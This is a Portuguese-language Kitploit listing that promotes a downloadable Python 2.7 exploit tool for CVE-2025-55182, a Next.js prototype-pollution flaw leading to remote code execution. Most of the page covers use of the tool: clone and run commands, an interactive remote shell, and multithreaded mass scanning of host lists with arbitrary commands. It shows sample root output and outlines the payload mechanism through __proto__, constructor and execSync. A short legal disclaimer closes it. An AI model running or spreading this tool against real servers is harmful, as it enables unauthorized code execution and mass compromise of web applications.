Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-React2shell — Ferramenta de Exploit CVE-2025-55182 – exploit em Python 2.7 para poluição de prototype no Next.js que leva a RCE | Kitploit
Ferramentas/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

Ferramenta de Exploit CVE-2025-55182 – exploit em Python 2.7 para poluição de prototype no Next.js que leva a RCE

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
61há 2 mesesAinda não revisado

CVE-2025-55182 - React2shell

Um exploit em Python 2.7 para CVE-2025-55182 – uma vulnerabilidade crítica de poluição de protótipo / RCE em aplicações Next.js.
Esta ferramenta permite tanto shell interativo para um único alvo quanto varredura em massa de múltiplos hosts com multithreading, saída colorida e fallback automático para HTTPS.


🚀 Funcionalidades

  • ✅ Shell Interativo para alvos únicos – execute comandos arbitrários do sistema
  • ✅ Varredura em Massa a partir de uma lista de arquivos – multithread, rápida, resultados salvos automaticamente
  • ✅ Detecção Automática – URL única → modo shell, arquivo existente → modo varredura em massa
  • ✅ HTTPS Automático – adiciona https:// se nenhum protocolo for fornecido
  • ✅ Escrita de arquivo thread-safe – salva resultados vulneráveis em tempo real
  • ✅ Comandos Personalizados – altere o id padrão para qualquer comando (whoami, ls, etc.)
  • ✅ Sem dependências externas – apenas requests (facilmente instalável)

📋 Requisitos

  • Python 2.7 (a ferramenta é especificamente escrita para Python 2.7)
  • Biblioteca requests – instale com:
    root@kitploit:~
    pip install requests
    

  • Um terminal que suporte cores ANSI (a maioria dos terminais Linux/macOS, Windows Terminal, PowerShell)

📦 Instalação

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

Torne o script executável (opcional):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 Uso

1. Shell Interativo (Alvo Único)

root@kitploit:~
python2 CVE-2025-55182.py https://target.com

ou sem protocolo (HTTPS é adicionado automaticamente):

root@kitploit:~
python2 CVE-2025-55182.py target.com

Uma vez conectado e verificado como vulnerável, você recebe um prompt de shell:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

Comandos internos:

  • exit / quit – fecha o shell
  • clear – limpa a tela
  • help – mostra ajuda

2. Varredura em Massa (Lista de Alvos)

Prepare um arquivo com um alvo por linha (com ou sem http/https):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

Execute a varredura em massa (padrão: 10 threads, comando id, saída res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

Personalize threads, comando, arquivo de saída:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
  • 20 – número de threads
  • whoami – comando a ser executado em cada alvo vulnerável
  • results.txt – arquivo de saída (apenas entradas vulneráveis são salvas)

Exemplo de saída da varredura em massa:

root@kitploit:~
[INFO] Carregadas 4 URLs
[INFO] Threads: 10, Comando: 'id', Saída: res.txt

[*] (1/4) Verificando: https://site.com
[+] VULNERÁVEL: https://site.com
    Status: 303
    Saída: uid=0(root) gid=0(root) groups=0(root)

[-] NÃO VULNERÁVEL: https://example.com
...

Resultados salvos (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 Como Funciona

O exploit envia uma requisição multipart/form-data manipulada para um endpoint Next.js (/login é anexado se o caminho estiver vazio). Ele abusa da poluição de protótipo (__proto__:then e constructor:constructor) para injetar um prefixo malicioso que executa um comando do sistema usando child_process.execSync().

O servidor responde com um redirecionamento 303 contendo a saída do comando no cabeçalho x-action-redirect (ou Location). A ferramenta extrai o resultado de /login?a=<output>.


🛡️ Aviso Legal

Esta ferramenta é destinada apenas para fins educacionais e testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou danos causados por este software. Você deve ter permissão explícita por escrito do proprietário do sistema alvo antes de usar este exploit.

Mais avisos podem ser encontrados na capa do Jenderal92. Você pode conferir AQUI !!!

Baixar ferramenta